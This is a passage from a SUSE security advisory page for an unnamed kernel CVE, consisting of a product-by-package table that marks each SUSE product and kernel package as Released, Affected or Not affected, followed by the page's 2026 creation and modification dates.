| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-default-base | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-docs | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-obs-build | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-source-azure | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-syms | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-syms-azure | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-zfcpdump | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-azure | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-default | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-default-base | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-docs | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-kvmsmall | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-livepatch-SLE16_Update_0 | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-livepatch-SLE16_Update_1 | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-livepatch-SLE16_Update_2 | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-livepatch-SLE16_Update_3 | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-livepatch-SLE16_Update_4 | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-obs-qa | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-source | Released |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-source-azure | Affected |
| SUSE Linux Enterprise Server for SAP applications 16.0 | kernel-syms | Released |
| SUSE Linux Enterprise Server for SAP applications 16.1 | kernel-source | Affected |
| SUSE Linux Enterprise Workstation Extension 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise Workstation Extension 15 SP7 | kernel-source | Released |
| SUSE Linux Micro 6.0 | kernel-default | Released |
| SUSE Linux Micro 6.0 | kernel-default-base | Released |
| SUSE Linux Micro 6.0 | kernel-kvmsmall | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_10 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_11 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_12 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_13 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_14 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_15 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_6 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_7 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_8 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0-RT_Update_9 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_10 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_11 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_12 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_13 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_14 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_6 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_7 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_8 | Released |
| SUSE Linux Micro 6.0 | kernel-livepatch-MICRO-6-0_Update_9 | Released |
| SUSE Linux Micro 6.0 | kernel-rt | Released |
| SUSE Linux Micro 6.0 | kernel-source | Released |
| SUSE Linux Micro 6.0 | kernel-source-rt | Released |
| SUSE Linux Micro 6.1 | kernel-default | Released |
| SUSE Linux Micro 6.1 | kernel-default-base | Released |
| SUSE Linux Micro 6.1 | kernel-kvmsmall | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_10 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_11 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_12 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_13 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_14 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_15 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_6 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_7 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_8 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0-RT_Update_9 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_10 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_11 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_12 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_13 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_14 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_6 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_7 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_8 | Released |
| SUSE Linux Micro 6.1 | kernel-livepatch-MICRO-6-0_Update_9 | Released |
| SUSE Linux Micro 6.1 | kernel-rt | Released |
| SUSE Linux Micro 6.1 | kernel-source | Released |
| SUSE Linux Micro 6.1 | kernel-source-rt | Released |
| SUSE Linux Micro 6.2 | kernel-64kb | Released |
| SUSE Linux Micro 6.2 | kernel-default | Released |
| SUSE Linux Micro 6.2 | kernel-default-base | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16-RT_Update_0 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16-RT_Update_1 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16-RT_Update_2 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16-RT_Update_3 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16-RT_Update_4 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16_Update_0 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16_Update_1 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16_Update_2 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16_Update_3 | Released |
| SUSE Linux Micro 6.2 | kernel-livepatch-SLE16_Update_4 | Released |
| SUSE Linux Micro 6.2 | kernel-rt | Released |
| SUSE Linux Micro 6.2 | kernel-source | Released |
| SUSE Real Time Module 15 SP7 | kernel-rt | Released |
| SUSE Real Time Module 15 SP7 | kernel-source-rt | Released |
| SUSE Real Time Module 15 SP7 | kernel-syms-rt | Released |
| Products under Long Term Service Pack support and receiving important and critical security fixes. | ||
| SUSE Linux Enterprise High Availability Extension 15 SP4 | kernel-default | Released |
| SUSE Linux Enterprise High Availability Extension 15 SP4 | kernel-source | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4 | kernel-source | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | kernel-64kb | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | kernel-default | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | kernel-default-base | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | kernel-docs | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | kernel-obs-build | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | kernel-source | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | kernel-syms | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5 | kernel-source | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | kernel-64kb | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | kernel-default | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | kernel-default-base | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | kernel-docs | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | kernel-obs-build | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | kernel-source | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | kernel-syms | Released |
| SUSE Linux Enterprise Live Patching 12 SP5 | kernel-default | Not affected |
| SUSE Linux Enterprise Live Patching 12 SP5 | kernel-source | Not affected |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-default | Released |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-livepatch-SLE15-SP4_Update_42 | Released |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-livepatch-SLE15-SP4_Update_43 | Released |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-livepatch-SLE15-SP4_Update_44 | Released |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-livepatch-SLE15-SP4_Update_45 | Released |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-livepatch-SLE15-SP4_Update_46 | Released |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-livepatch-SLE15-SP4_Update_47 | Released |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-livepatch-SLE15-SP4_Update_48 | Released |
| SUSE Linux Enterprise Live Patching 15 SP4 | kernel-source | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-default | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_25 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_26 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_27 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_28 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_29 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_30 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_31 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_32 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_33 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_34 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-livepatch-SLE15-SP5_Update_35 | Released |
| SUSE Linux Enterprise Live Patching 15 SP5 | kernel-source | Released |
| SUSE Linux Enterprise Module for Basesystem 15 SP4 | kernel-source | Affected |
| SUSE Linux Enterprise Module for Basesystem 15 SP5 | kernel-source | Affected |
| SUSE Linux Enterprise Module for Basesystem 15 SP6 | kernel-default | Affected |
| SUSE Linux Enterprise Module for Basesystem 15 SP6 | kernel-source | Affected |
| SUSE Linux Enterprise Module for Development Tools 15 SP4 | kernel-source | Affected |
| SUSE Linux Enterprise Module for Development Tools 15 SP5 | kernel-source | Affected |
| SUSE Linux Enterprise Module for Development Tools 15 SP6 | kernel-source | Affected |
| SUSE Linux Enterprise Server 11 SP4 LTSS EXTREME CORE | kernel-default | Not affected |
| SUSE Linux Enterprise Server 11 SP4 LTSS EXTREME CORE | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP5 | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP5-LTSS | kernel-default | Not affected |
| SUSE Linux Enterprise Server 12 SP5-LTSS | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP5-LTSS Extended Security | kernel-default | Not affected |
| SUSE Linux Enterprise Server 12 SP5-LTSS Extended Security | kernel-source | Not affected |
| SUSE Linux Enterprise Server 15 SP4 | kernel-source | Affected |
| SUSE Linux Enterprise Server 15 SP4-LTSS | kernel-64kb | Released |
| SUSE Linux Enterprise Server 15 SP4-LTSS | kernel-default | Released |
| SUSE Linux Enterprise Server 15 SP4-LTSS | kernel-default-base | Released |
| SUSE Linux Enterprise Server 15 SP4-LTSS | kernel-docs | Released |
| SUSE Linux Enterprise Server 15 SP4-LTSS | kernel-obs-build | Released |
| SUSE Linux Enterprise Server 15 SP4-LTSS | kernel-source | Released |
| SUSE Linux Enterprise Server 15 SP4-LTSS | kernel-syms | Released |
| SUSE Linux Enterprise Server 15 SP4-LTSS | kernel-zfcpdump | Released |
| SUSE Linux Enterprise Server 15 SP5 | kernel-source | Affected |
| SUSE Linux Enterprise Server 15 SP5-LTSS | kernel-64kb | Released |
| SUSE Linux Enterprise Server 15 SP5-LTSS | kernel-default | Released |
| SUSE Linux Enterprise Server 15 SP5-LTSS | kernel-default-base | Released |
| SUSE Linux Enterprise Server 15 SP5-LTSS | kernel-docs | Released |
| SUSE Linux Enterprise Server 15 SP5-LTSS | kernel-obs-build | Released |
| SUSE Linux Enterprise Server 15 SP5-LTSS | kernel-source | Released |
| SUSE Linux Enterprise Server 15 SP5-LTSS | kernel-syms | Released |
| SUSE Linux Enterprise Server 15 SP5-LTSS | kernel-zfcpdump | Released |
| SUSE Linux Enterprise Server 15 SP6 | kernel-default | Affected |
| SUSE Linux Enterprise Server 15 SP6 | kernel-source | Affected |
| SUSE Linux Enterprise Server 15 SP6-LTSS | kernel-64kb | Released |
| SUSE Linux Enterprise Server 15 SP6-LTSS | kernel-default | Released |
| SUSE Linux Enterprise Server 15 SP6-LTSS | kernel-default-base | Released |
| SUSE Linux Enterprise Server 15 SP6-LTSS | kernel-docs | Released |
| SUSE Linux Enterprise Server 15 SP6-LTSS | kernel-obs-build | Released |
| SUSE Linux Enterprise Server 15 SP6-LTSS | kernel-source | Released |
| SUSE Linux Enterprise Server 15 SP6-LTSS | kernel-syms | Released |
| SUSE Linux Enterprise Server 15 SP6-LTSS | kernel-zfcpdump | Released |
| SUSE Linux Enterprise Server LTSS Extended Security 12 SP5 | kernel-source | Not affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | kernel-default | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | kernel-default-base | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | kernel-docs | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | kernel-obs-build | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | kernel-source | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | kernel-syms | Released |
| SUSE Manager Proxy 4.3 | kernel-source | Affected |
| SUSE Manager Proxy LTS 4.3 | kernel-default | Released |
| SUSE Manager Proxy LTS 4.3 | kernel-default-base | Released |
| SUSE Manager Proxy LTS 4.3 | kernel-source | Released |
| SUSE Manager Proxy LTS 4.3 | kernel-syms | Released |
| SUSE Manager Retail Branch Server 4.3 | kernel-source | Affected |
| SUSE Manager Retail Branch Server LTS 4.3 | kernel-default | Released |
| SUSE Manager Retail Branch Server LTS 4.3 | kernel-default-base | Released |
| SUSE Manager Retail Branch Server LTS 4.3 | kernel-source | Released |
| SUSE Manager Server 4.3 | kernel-source | Affected |
| SUSE Manager Server LTS 4.3 | kernel-default | Released |
| SUSE Manager Server LTS 4.3 | kernel-default-base | Released |
| SUSE Manager Server LTS 4.3 | kernel-source | Released |
| SUSE Manager Server LTS 4.3 | kernel-syms | Released |
| SUSE Manager Server LTS 4.3 | kernel-zfcpdump | Released |
| Products past their end of life and not receiving proactive updates anymore. | ||
| SUSE CaaS Platform 4.0 | kernel-source | Not affected |
| SUSE Enterprise Storage 6 | kernel-source | Not affected |
| SUSE Enterprise Storage 7 | kernel-source | Not affected |
| SUSE Enterprise Storage 7.1 | kernel-source | Affected |
| SUSE Linux Enterprise Desktop 11 SP4 | kernel-source | Not affected |
| SUSE Linux Enterprise Desktop 12 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Desktop 12 SP4 | kernel-source | Not affected |
| SUSE Linux Enterprise Desktop 15 SP1 | kernel-source | Not affected |
| SUSE Linux Enterprise Desktop 15 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Desktop 15 SP3 | kernel-source | Affected |
| SUSE Linux Enterprise Desktop 15 SP4 | kernel-source | Affected |
| SUSE Linux Enterprise Desktop 15 SP5 | kernel-source | Affected |
| SUSE Linux Enterprise Desktop 15 SP6 | kernel-default | Affected |
| SUSE Linux Enterprise Desktop 15 SP6 | kernel-source | Affected |
| SUSE Linux Enterprise High Availability Extension 15 SP6 | kernel-default | Released |
| SUSE Linux Enterprise High Availability Extension 15 SP6 | kernel-source | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP1 | kernel-source | Not affected |
| SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS | kernel-source | Not affected |
| SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS | kernel-source | Not affected |
| SUSE Linux Enterprise High Performance Computing 15 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS | kernel-source | Not affected |
| SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS | kernel-source | Not affected |
| SUSE Linux Enterprise High Performance Computing 15 SP3 | kernel-source | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS | kernel-source | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS | kernel-source | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | kernel-64kb | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | kernel-default | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | kernel-default-base | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | kernel-docs | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | kernel-obs-build | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | kernel-source | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | kernel-syms | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | kernel-64kb | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | kernel-default | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | kernel-default-base | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | kernel-docs | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | kernel-obs-build | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | kernel-source | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | kernel-syms | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP6 | kernel-default | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP6 | kernel-source | Affected |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-default | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_10 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_11 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_12 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_13 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_14 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_15 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_16 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_17 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_18 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_19 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-livepatch-SLE15-SP6_Update_20 | Released |
| SUSE Linux Enterprise Live Patching 15 SP6 | kernel-source | Released |
| SUSE Linux Enterprise Micro 5.0 | kernel-default | Not affected |
| SUSE Linux Enterprise Micro 5.1 | kernel-default | Released |
| SUSE Linux Enterprise Micro 5.1 | kernel-rt | Released |
| SUSE Linux Enterprise Micro 5.1 | kernel-source-rt | Affected |
| SUSE Linux Enterprise Micro 5.2 | kernel-default | Released |
| SUSE Linux Enterprise Micro 5.2 | kernel-default-base | Released |
| SUSE Linux Enterprise Micro 5.2 | kernel-rt | Released |
| SUSE Linux Enterprise Micro 5.2 | kernel-source | Released |
| SUSE Linux Enterprise Micro 5.2 | kernel-source-rt | Released |
| SUSE Linux Enterprise Module for Basesystem 15 SP1 | kernel-source | Not affected |
| SUSE Linux Enterprise Module for Basesystem 15 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Module for Basesystem 15 SP3 | kernel-source | Affected |
| SUSE Linux Enterprise Module for Development Tools 15 SP1 | kernel-source | Not affected |
| SUSE Linux Enterprise Module for Development Tools 15 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Module for Development Tools 15 SP3 | kernel-source | Affected |
| SUSE Linux Enterprise Point of Sale 12 SP2-CLIENT | kernel-source | Not affected |
| SUSE Linux Enterprise Real Time 15 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Real Time 15 SP3 | kernel-source | Affected |
| SUSE Linux Enterprise Real Time 15 SP3 | kernel-source-rt | Affected |
| SUSE Linux Enterprise Real Time 15 SP4 | kernel-source | Affected |
| SUSE Linux Enterprise Real Time 15 SP4 | kernel-source-rt | Affected |
| SUSE Linux Enterprise Real Time 15 SP5 | kernel-source-rt | Affected |
| SUSE Linux Enterprise Server 11 SP4 | kernel-source | Not affected |
| SUSE Linux Enterprise Server 11 SP4-LTSS | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP2-BCL | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP2-ESPOS | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP2-LTSS | kernel-default | Not affected |
| SUSE Linux Enterprise Server 12 SP2-LTSS | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP4 | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP4-ESPOS | kernel-source | Not affected |
| SUSE Linux Enterprise Server 12 SP4-LTSS | kernel-default | Not affected |
| SUSE Linux Enterprise Server 12 SP4-LTSS | kernel-source | Not affected |
| SUSE Linux Enterprise Server 15 SP1 | kernel-source | Not affected |
| SUSE Linux Enterprise Server 15 SP1-BCL | kernel-source | Not affected |
| SUSE Linux Enterprise Server 15 SP1-LTSS | kernel-default | Not affected |
| SUSE Linux Enterprise Server 15 SP1-LTSS | kernel-source | Not affected |
| SUSE Linux Enterprise Server 15 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Server 15 SP2-BCL | kernel-source | Not affected |
| SUSE Linux Enterprise Server 15 SP2-LTSS | kernel-default | Not affected |
| SUSE Linux Enterprise Server 15 SP2-LTSS | kernel-source | Not affected |
| SUSE Linux Enterprise Server 15 SP3 | kernel-source | Affected |
| SUSE Linux Enterprise Server 15 SP3-BCL | kernel-source | Affected |
| SUSE Linux Enterprise Server 15 SP3-LTSS | kernel-default | Affected |
| SUSE Linux Enterprise Server 15 SP3-LTSS | kernel-source | Affected |
| SUSE Linux Enterprise Server for Raspberry Pi 12 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Server for SAP Applications 12 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Server for SAP Applications 12 SP4 | kernel-source | Not affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP1 | kernel-source | Not affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP2 | kernel-source | Not affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP3 | kernel-source | Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | kernel-default | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | kernel-default-base | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | kernel-docs | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | kernel-obs-build | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | kernel-source | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | kernel-syms | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | kernel-default | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | kernel-default-base | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | kernel-docs | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | kernel-obs-build | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | kernel-source | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | kernel-syms | Released |
| SUSE Manager Proxy 4.0 | kernel-source | Not affected |
| SUSE Manager Proxy 4.1 | kernel-source | Not affected |
| SUSE Manager Proxy 4.2 | kernel-source | Affected |
| SUSE Manager Retail Branch Server 4.0 | kernel-source | Not affected |
| SUSE Manager Retail Branch Server 4.1 | kernel-source | Not affected |
| SUSE Manager Retail Branch Server 4.2 | kernel-source | Affected |
| SUSE Manager Server 4.0 | kernel-source | Not affected |
| SUSE Manager Server 4.1 | kernel-source | Not affected |
| SUSE Manager Server 4.2 | kernel-source | Affected |
| SUSE OpenStack Cloud 7 | kernel-source | Not affected |
| SUSE OpenStack Cloud 9 | kernel-source | Not affected |
| SUSE OpenStack Cloud Crowbar 9 | kernel-source | Not affected |
| SUSE Real Time Module 15 SP3 | kernel-source-rt | Affected |
| SUSE Real Time Module 15 SP4 | kernel-source-rt | Affected |
| SUSE Real Time Module 15 SP5 | kernel-source-rt | Affected |
| openSUSE Leap 15.3 | kernel-default | Released |
| openSUSE Leap 15.3 | kernel-source | Released |
| openSUSE Leap 15.3 | kernel-source-rt | Affected |
| openSUSE Leap 15.4 | kernel-default | Released |
| openSUSE Leap 15.4 | kernel-source | Released |
| openSUSE Leap 15.4 | kernel-source-rt | Affected |
| openSUSE Leap 15.5 | kernel-default | Released |
| openSUSE Leap 15.5 | kernel-source | Released |
| openSUSE Leap 15.5 | kernel-source-rt | Released |
| openSUSE Leap 15.6 | kernel-default | Released |
| openSUSE Leap 15.6 | kernel-source | Released |
| Products at an unknown state of their lifecycle. | ||
| SUSE Manager Proxy 4.3 LTS | kernel-default | Released |
| SUSE Manager Proxy 4.3 LTS | kernel-source | Released |
| SUSE Manager Retail Branch Server 4.3 LTS | kernel-default | Released |
| SUSE Manager Retail Branch Server 4.3 LTS | kernel-source | Released |
| SUSE Manager Server 4.3 LTS | kernel-default | Released |
| SUSE Manager Server 4.3 LTS | kernel-source | Released |
SUSE Timeline for this CVE
CVE page created: Tue Jan 13 18:04:40 2026CVE page last modified: Fri May 15 16:23:35 2026